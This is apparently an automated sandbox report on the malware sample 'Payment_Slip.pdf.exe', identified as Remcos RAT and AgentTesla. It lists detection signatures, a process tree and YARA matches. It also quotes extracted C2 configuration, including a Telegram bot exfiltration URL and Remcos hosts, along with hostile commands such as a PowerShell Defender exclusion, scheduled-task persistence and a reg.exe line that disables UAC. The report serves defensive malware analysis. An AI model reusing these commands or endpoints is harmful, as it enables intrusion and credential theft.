Edit tour

Windows Analysis Report
Payment_Slip.pdf.exe

Overview

General Information

Sample name:	Payment_Slip.pdf.exe
Analysis ID:	1639467
MD5:	90133947ec6add62c5d9b23c475f602f
SHA1:	7cf9a2a412aa3bb5f78f19ba419551faad4758f2
SHA256:	a35234d3e33acbb7e53abaec38ced3a45f6df0ad5ee17ba52b49478d0418f1da
Tags:	exeuser-BastianHein
Infos:

Detection

Remcos, AgentTesla

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Sigma detected: Scheduled temp file as task from temp location

Sigma detected: Suspicious Double Extension File Execution

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected Remcos RAT

Yara detected Telegram RAT

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Creates multiple autostart registry keys

Delayed program exit found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Installs a global keyboard hook

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses an obfuscated file name to hide its real file extension (double extension)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected WebBrowserPassView password recovery tool

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Payment_Slip.pdf.exe (PID: 8060 cmdline: "C:\Users\user\Desktop\Payment_Slip.pdf.exe" MD5: 90133947EC6ADD62C5D9B23C475F602F)

powershell.exe (PID: 8180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7760 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7200 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Payment_Slip.pdf.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\Payment_Slip.pdf.exe" MD5: 90133947EC6ADD62C5D9B23C475F602F)

host.exe (PID: 4860 cmdline: "C:\Users\user\AppData\Roaming\host.exe" MD5: ACCFB066306C95FEA0ED42DC99DF1634)

conserver.exe (PID: 8164 cmdline: "C:\Users\user\AppData\Local\Temp\conserver.exe" MD5: CF397453A71790C27900FD457D4764C3)

Payment_Slip.pdf.exe (PID: 6592 cmdline: C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\qticobshgwcqiiv" MD5: 90133947EC6ADD62C5D9B23C475F602F)

Payment_Slip.pdf.exe (PID: 7272 cmdline: C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\snnvpudbueuusojfxn" MD5: 90133947EC6ADD62C5D9B23C475F602F)

Payment_Slip.pdf.exe (PID: 7200 cmdline: C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\dpanqmncqmmhvvfjoxmrs" MD5: 90133947EC6ADD62C5D9B23C475F602F)

dwn.exe (PID: 7300 cmdline: "C:\Users\user\AppData\Local\Temp\dwn.exe" MD5: E3AE2634B39F83C9218977B5F3539E58)

mHTmhPhJy.exe (PID: 7856 cmdline: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe MD5: 90133947EC6ADD62C5D9B23C475F602F)

schtasks.exe (PID: 1944 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mHTmhPhJy.exe (PID: 5392 cmdline: "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe" MD5: 90133947EC6ADD62C5D9B23C475F602F)

svchost.exe (PID: 60 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

Windows Update.exe (PID: 8368 cmdline: "C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe" MD5: CF397453A71790C27900FD457D4764C3)

mykksg.exe (PID: 8492 cmdline: "C:\Users\user\AppData\Roaming\mykksg\mykksg.exe" MD5: ACCFB066306C95FEA0ED42DC99DF1634)

Windows Update.exe (PID: 8628 cmdline: "C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe" MD5: CF397453A71790C27900FD457D4764C3)

mykksg.exe (PID: 8792 cmdline: "C:\Users\user\AppData\Roaming\mykksg\mykksg.exe" MD5: ACCFB066306C95FEA0ED42DC99DF1634)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendMessage?chat_id=5559571239"}

Threatname: Remcos

{"Host:Port:Password": ["ratianaana701.bounceme.net:9373:1", "milala.duckdns.org:9373:1"], "Assigned name": "MARCH 15", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-TWFFFD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\remcos\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\AppData\Roaming\host.exe	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\conserver.exe	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\conserver.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\conserver.exe	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x30161:$a13: get_DnsResolver 0x2e980:$a20: get_LastAccessed 0x30adf:$a27: set_InternalServerPort 0x30e13:$a30: set_GuidMasterKey 0x2ea87:$a33: get_Clipboard 0x2ea95:$a34: get_Keyboard 0x2fd94:$a35: get_ShiftKeyDown 0x2fda5:$a36: get_AltKeyDown 0x2eaa2:$a37: get_Password 0x2f544:$a38: get_PasswordHash 0x30561:$a39: get_DefaultCredentials
C:\Users\user\AppData\Local\Temp\conserver.exe	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32a2d:$s10: logins 0x32494:$s11: credential 0x2ea87:$g1: get_Clipboard 0x2ea95:$g2: get_Keyboard 0x2eaa2:$g3: get_Password 0x2fd84:$g4: get_CtrlKeyDown 0x2fd94:$g5: get_ShiftKeyDown 0x2fda5:$g6: get_AltKeyDown
C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x30161:$a13: get_DnsResolver 0x2e980:$a20: get_LastAccessed 0x30adf:$a27: set_InternalServerPort 0x30e13:$a30: set_GuidMasterKey 0x2ea87:$a33: get_Clipboard 0x2ea95:$a34: get_Keyboard 0x2fd94:$a35: get_ShiftKeyDown 0x2fda5:$a36: get_AltKeyDown 0x2eaa2:$a37: get_Password 0x2f544:$a38: get_PasswordHash 0x30561:$a39: get_DefaultCredentials
C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32a2d:$s10: logins 0x32494:$s11: credential 0x2ea87:$g1: get_Clipboard 0x2ea95:$g2: get_Keyboard 0x2eaa2:$g3: get_Password 0x2fd84:$g4: get_CtrlKeyDown 0x2fd94:$g5: get_ShiftKeyDown 0x2fda5:$g6: get_AltKeyDown
C:\Users\user\AppData\Local\Temp\dwn.exe	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\AppData\Local\Temp\dwn.exe	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
C:\Users\user\AppData\Local\Temp\dwn.exe	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
C:\Users\user\AppData\Local\Temp\dwn.exe	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
Click to see the 10 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001A.00000002.3620793390.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x691e0:$a1: Remcos restarted by watchdog! 0x69738:$a3: %02i:%02i:%02i:%03i 0x69abd:$a4: * Remcos v
0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x641e4:$str_a1: C:\Windows\System32\cmd.exe 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6320c:$str_b2: Executing file: 0x64328:$str_b3: GetDirectListeningPort 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63e30:$str_b7: \update.vbs 0x63234:$str_b9: Downloaded file: 0x63220:$str_b10: Downloading file: 0x632c4:$str_b12: Failed to upload file: 0x642f0:$str_b13: StartForward 0x64310:$str_b14: StopForward 0x63dd8:$str_b15: fso.DeleteFile " 0x63d6c:$str_b16: On Error Resume Next 0x63e08:$str_b17: fso.DeleteFolder " 0x632b4:$str_b18: Uploaded file: 0x63274:$str_b19: Unable to delete: 0x63da0:$str_b20: while fso.FileExists(" 0x63749:$str_c0: [Firefox StoredLogins not found]
0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63100:$s1: \Classes\mscfile\shell\open\command 0x63160:$s1: \Classes\mscfile\shell\open\command 0x63148:$s2: eventvwr.exe
0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000002.3619471195.00000000030AD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000018.00000002.1539307669.00000000032DD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x2ff61:$a13: get_DnsResolver 0x2e780:$a20: get_LastAccessed 0x308df:$a27: set_InternalServerPort 0x30c13:$a30: set_GuidMasterKey 0x2e887:$a33: get_Clipboard 0x2e895:$a34: get_Keyboard 0x2fb94:$a35: get_ShiftKeyDown 0x2fba5:$a36: get_AltKeyDown 0x2e8a2:$a37: get_Password 0x2f344:$a38: get_PasswordHash 0x30361:$a39: get_DefaultCredentials
00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x67b60:$a1: Remcos restarted by watchdog! 0xdd180:$a1: Remcos restarted by watchdog! 0x1523c0:$a1: Remcos restarted by watchdog! 0x680b8:$a3: %02i:%02i:%02i:%03i 0xdd6d8:$a3: %02i:%02i:%02i:%03i 0x152918:$a3: %02i:%02i:%02i:%03i 0x6843d:$a4: * Remcos v 0xdda5d:$a4: * Remcos v 0x152c9d:$a4: * Remcos v
00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000000.1218869543.0000000000242000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x68148:$a1: Remcos restarted by watchdog! 0xdd768:$a1: Remcos restarted by watchdog! 0x1529a8:$a1: Remcos restarted by watchdog! 0x686a0:$a3: %02i:%02i:%02i:%03i 0xddcc0:$a3: %02i:%02i:%02i:%03i 0x152f00:$a3: %02i:%02i:%02i:%03i 0x68a25:$a4: * Remcos v 0xde045:$a4: * Remcos v 0x153285:$a4: * Remcos v
Process Memory Space: Payment_Slip.pdf.exe PID: 8060	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Payment_Slip.pdf.exe PID: 8060	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Payment_Slip.pdf.exe PID: 8060	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x3f435:$a1: Remcos restarted by watchdog! 0x3f96c:$a3: %02i:%02i:%02i:%03i 0x3ff25:$a3: %02i:%02i:%02i:%03i 0x3fb8e:$a4: * Remcos v
Process Memory Space: Payment_Slip.pdf.exe PID: 7544	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: mHTmhPhJy.exe PID: 7856	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: mHTmhPhJy.exe PID: 7856	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: mHTmhPhJy.exe PID: 7856	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x2453c:$a1: Remcos restarted by watchdog! 0x24a73:$a3: %02i:%02i:%02i:%03i 0x2502c:$a3: %02i:%02i:%02i:%03i 0x24c95:$a4: * Remcos v
Process Memory Space: mHTmhPhJy.exe PID: 5392	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: mHTmhPhJy.exe PID: 5392	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x9591:$a1: Remcos restarted by watchdog! 0x9ac8:$a3: %02i:%02i:%02i:%03i 0xa081:$a3: %02i:%02i:%02i:%03i 0x9cea:$a4: * Remcos v
Process Memory Space: host.exe PID: 4860	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: host.exe PID: 4860	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: host.exe PID: 4860	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: conserver.exe PID: 8164	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: conserver.exe PID: 8164	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: conserver.exe PID: 8164	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x688ae:$a13: get_DnsResolver 0x6732d:$a20: get_LastAccessed 0x691db:$a27: set_InternalServerPort 0x6944f:$a30: set_GuidMasterKey 0x67420:$a33: get_Clipboard 0x6742e:$a34: get_Keyboard 0x68580:$a35: get_ShiftKeyDown 0x68591:$a36: get_AltKeyDown 0x6743b:$a37: get_Password 0x67e39:$a38: get_PasswordHash 0x68c82:$a39: get_DefaultCredentials
Process Memory Space: Payment_Slip.pdf.exe PID: 6592	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: dwn.exe PID: 7300	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: dwn.exe PID: 7300	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x106f0:$a1: Remcos restarted by watchdog! 0x1a55e:$a1: Remcos restarted by watchdog! 0x10c27:$a3: %02i:%02i:%02i:%03i 0x111e0:$a3: %02i:%02i:%02i:%03i 0x1aa95:$a3: %02i:%02i:%02i:%03i 0x1b04e:$a3: %02i:%02i:%02i:%03i 0x10e49:$a4: * Remcos v 0x1acb7:$a4: * Remcos v
Process Memory Space: Windows Update.exe PID: 8368	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Windows Update.exe PID: 8368	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: mykksg.exe PID: 8492	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: mykksg.exe PID: 8492	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: mykksg.exe PID: 8492	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Windows Update.exe PID: 8628	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Windows Update.exe PID: 8628	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: mykksg.exe PID: 8792	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: mykksg.exe PID: 8792	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
